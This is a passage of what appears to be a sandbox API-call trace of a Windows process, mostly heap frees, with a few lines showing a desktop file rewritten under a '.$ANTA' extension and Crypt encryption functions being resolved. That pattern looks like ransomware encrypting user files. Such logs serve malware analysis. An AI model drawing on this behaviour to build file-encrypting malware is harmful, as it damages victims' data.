hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0126.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0126.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392618 | out: hHeap=0x1780000) returned 1 [0126.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0126.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0126.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0126.611] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\V_VfUPg6JY sjdteIA3.gif.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\v_vfupg6jy sjdteia3.gif.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0126.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0126.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0126.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0126.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0126.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0126.611] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0126.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0126.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0126.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0126.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0126.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0126.612] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0126.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0126.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0126.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0126.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0126.614] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0126.614] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0xa4a, lpOverlapped=0x0) returned 1 [0126.615] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0126.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0126.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0126.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0126.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b87020 | out: hHeap=0x1780000) returned 1 [0126.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0126.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0126.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0126.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0126.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43fb458 | out: hHeap=0x1780000) returned 1 [0126.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0126.618] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0126.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0126.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43fb458 | out: hHeap=0x1780000) returned 1 [0126.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0126.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0126.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0126.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0126.618] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0126.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0126.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0126.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0126.619] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0126.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43925e0 | out: hHeap=0x1780000) returned 1 [0126.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0126.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0126.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0126.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0126.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0126.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0126.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0126.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0126.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0126.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0126.619] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0126.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0126.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0126.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0126.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0126.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0126.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0126.620] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0126.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0126.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0126.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0126.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0126.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0126.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0126.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0126.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0126.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0126.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0126.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0126.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0126.620] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0126.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0126.620] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0126.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392420 | out: hHeap=0x1780000) returned 1 [0126.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0126.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0126.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0126.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0126.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0126.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0126.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0126.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0126.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0126.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0126.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0126.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0126.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0126.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0126.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0126.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0126.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0126.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0126.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0126.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0126.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0126.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0126.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0126.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0126.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0126.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0126.669] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0126.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0126.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0126.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0126.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0126.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0126.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0126.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0126.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0126.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0126.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0126.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0126.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0126.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0126.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0126.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0126.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0126.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0126.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0126.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0126.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0126.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0126.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0126.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0126.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0126.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796e88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0126.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0126.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0126.670] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0126.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0126.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0126.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0126.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0126.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0126.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0126.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0126.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0126.670] CryptGetKeyParam (in: hKey=0x41ac600, dwParam=0x7, pbData=0x43e2910, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2910*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0126.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0126.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0126.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0126.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0126.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0126.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0126.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0126.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0126.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0126.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0126.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0126.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0126.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0126.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0126.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0126.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0126.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0126.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0126.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0126.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0126.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0126.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0126.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0126.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0126.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0126.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0126.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0126.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0126.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0126.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0126.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0126.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0126.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0126.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0126.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0126.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0126.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0126.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0126.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0126.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0126.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0126.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0126.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0126.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0126.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0126.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0126.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0126.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0126.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0126.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0126.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0126.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0126.672] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0126.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0126.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0126.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0126.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0126.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0126.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0126.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9128 | out: hHeap=0x1780000) returned 1 [0126.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0126.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0126.673] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0126.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0126.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0126.673] HeapFree (in: hHeap=0x1780000, 